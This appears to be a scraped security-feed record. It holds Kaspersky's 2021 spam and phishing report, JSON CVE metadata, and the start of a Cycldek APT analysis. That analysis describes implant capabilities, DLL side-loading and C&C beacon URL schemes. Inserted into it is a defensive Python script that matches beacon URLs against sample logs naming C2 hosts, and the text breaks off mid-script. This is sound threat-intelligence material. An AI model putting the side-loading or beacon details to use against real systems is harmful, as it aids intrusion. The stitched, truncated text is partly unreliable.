Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference being that visitors might not be able to watch anything at all without registering. Either way, the registration was no longer free. The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try your hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. 
After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The attackers' main objective was to trick the victim into following the link to a phishing page for entering login details. That's why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of "email Portal" or another similar resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. 
Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19, which dominated newsfeeds throughout the entire year, was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim's bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)\n\nThe sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in two ways: on the one hand, the buyer risks criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There's no guarantee that the code they're selling will work. 
Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)\n\n#### The corporate sector\n\nCOVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail themselves of this promised support was to \"confirm\" their e-mail address by logging in to their account on the scam website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)\n\nAnother malicious mailshot utilized e-mails with an attached HTML file called \"Covid Test Result\". Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)\n\nThe \"important message about vaccination\" which supposedly lay unread in a recipient's inbox also contained a link to a page belonging to attackers requesting corporate account details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)\n\nAnother type of attack deployed e-mails with malicious attachments. 
Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a "2 months salary receipt", was intended to make the recipient open the attachment with the malicious object as quickly as possible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)\n\n#### COVID-19 vaccination\n\nWhile authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)\n\nIn both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. 
The e-mail invited recipients to take part in a small study.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small necessary "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nLike in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. 
They were followed by the United States (10.46%) and China (8.73%), which also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as in 2020, Japan (2.36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. 
In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which create malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor called [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in the ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. 
This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%), whose share was just 0.01 p.p. higher than Germany's. They're followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. 
It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in fourth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nAs in 2020, most of the phishing websites blocked in 2021 used a .com domain name; its share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. Third place on the list was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). 
The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. 
Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We observed a spike in phishing activity on WhatsApp in July, when Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility. We also observed another brief surge in phishing activity in the week from October 31 through to November 6, 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. 
Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes \u2014 remaining two of the year's main themes \u2014 were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. 
Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. 
In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. 
The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks were witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**_Figure 1: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol (McAfee's QuickClean utility) or wsc_proxy.exe (Avast's remediation service).\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. 
It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. 
Notable characteristics of each cluster's implant are summarized in the table below.\n\nTrait | **BlueCore** | **RedCore** \n---|---|--- \nInitial Infection Vector | RTF documents | Unknown \nLegitimate AV Utility | QcConsol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) \nSide-Loaded DLL | QcLite.dll | wsc.dll \nPayload Loader | stdole.tlb (contains PE loading shellcode and an encrypted BlueCore binary) | msgsm64.acm (contains PE loading shellcode and an encrypted RedCore binary) \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or C:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6}, {F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB}, {E68DFA68-1132-4A32-ADE2-8C87F282C457}, {728264DE-3701-419B-84A4-2AD86B0C43A3}, {2BCD5B61-288C-44D5-BA0D-AAA00E9D2273}, {D9AE3AB0-D123-4F38-A9BE-898C8D49A214} \nCommunicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s or http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s \n \n_**Table 1: Comparison of BlueCore and RedCore loader and implant traits.**_\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. 
By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**_Figure 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants are launched by similar injected shellcode. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine that decrypts the implant's raw executable from an embedded blob, maps it into memory and executes it from its entry point in a new thread. Since the shellcode is identical for the two variants and cannot be attributed to any open-source project, we estimate that it originates from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**_Figure 3: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes every 10 ms to an internal buffer of size 65530. 
When this buffer is filled, its contents are written to a file named 'RCoRes64.dat', encoded with a single-byte XOR using the key 0xFA.\n * _Device enumerator_: RedCore registers a window class whose callback intercepts window messages and checks whether the message was sent as a result of a DBT_DEVICEARRIVAL event. Such events signal the connection of a device to the system, in which case the callback verifies that the device is a new volume and, if it is, sends a bitmap of the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>), which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware contacts the C&C and informs it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed to it from a source are validated and forwarded to the C&C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon to their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. 
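The two beacon URL schemes are the most actionable hunting artifact in this section. As an added example (not code from the report), the following Python classifies proxy-log requests into the BlueCore or RedCore cluster by path and the exact ordered set of query keys, and cross-checks the requesting process against the side-loading AV utilities and injection targets named in Table 1. The log line format, query values and timestamps are constructed; the two C&C host names are taken from the appendix of this post.

```python
"""Hunt for BlueCore / RedCore beacons in proxy telemetry.

Added example, not code from the Kaspersky report. The URL schemes and the
process names come from the report; the log format, the query values and the
timestamps are constructed for the demonstration.
"""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import parse_qsl, urlsplit

# Beacon URL formats as printed in the report. Once the implant fills in the
# %s/%d placeholders, what survives is the path and the ordered query keys.
CLUSTER_SIGNATURES = {
    "BlueCore": [("/link", ("url", "enpl", "encd"))],
    "RedCore": [
        ("/search.jsp", ("referer", "kw", "psid")),
        ("/search.jsp", ("url", "referer", "kw", "psid")),
    ],
}

# Processes the report names as the origin of the beacons: the side-loading AV
# utilities and the processes each implant injects into.
EXPECTED_PROCESSES = {
    "BlueCore": {"qcconsol.exe", "dllhst3g.exe"},
    "RedCore": {"wsc_proxy.exe", "explorer.exe", "winlogon.exe"},
}


@dataclass
class Beacon:
    cluster: str
    host: str
    port: int
    process: str
    process_expected: bool   # True when the requester is one the report names


def classify_url(url: str) -> Optional[str]:
    """Return the cluster whose beacon scheme the URL matches, or None.

    Key order is compared exactly because the implants build the URL from a
    fixed format string; relax to a set comparison if a variant reorders them.
    """
    parts = urlsplit(url)
    if parts.scheme != "http":
        return None
    keys = tuple(k for k, _ in parse_qsl(parts.query, keep_blank_values=True))
    for cluster, signatures in CLUSTER_SIGNATURES.items():
        for path, expected_keys in signatures:
            if parts.path == path and keys == expected_keys:
                return cluster
    return None


# Constructed log format: "<timestamp> <source ip> <process image> <url>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<proc>\S+)\s+(?P<url>\S+)$")


def hunt(log_lines: List[str]) -> List[Beacon]:
    """Parse the log lines and return every request matching a beacon scheme."""
    beacons = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        cluster = classify_url(m["url"])
        if cluster is None:
            continue
        parts = urlsplit(m["url"])
        proc = m["proc"].lower()
        beacons.append(Beacon(cluster, parts.hostname, parts.port or 80, proc,
                              proc in EXPECTED_PROCESSES[cluster]))
    return beacons


# Constructed sample telemetry; the C2 host names are the ones listed in the
# appendix, the query values and timestamps are made up.
SAMPLE_LOG = [
    "2018-09-03T08:12:44Z 10.1.4.22 dllhst3g.exe http://login.vietnamfar.com:8080/link?url=aGVsbG8&enpl=MQ&encd=Zm9v",
    "2018-09-03T08:13:01Z 10.1.4.22 chrome.exe http://www.example.com/search.jsp?q=weather",
    "2018-11-20T14:02:09Z 10.1.7.9 wsc_proxy.exe http://news.trungtamwtoa.com:88/search.jsp?referer=x&kw=y&psid=z",
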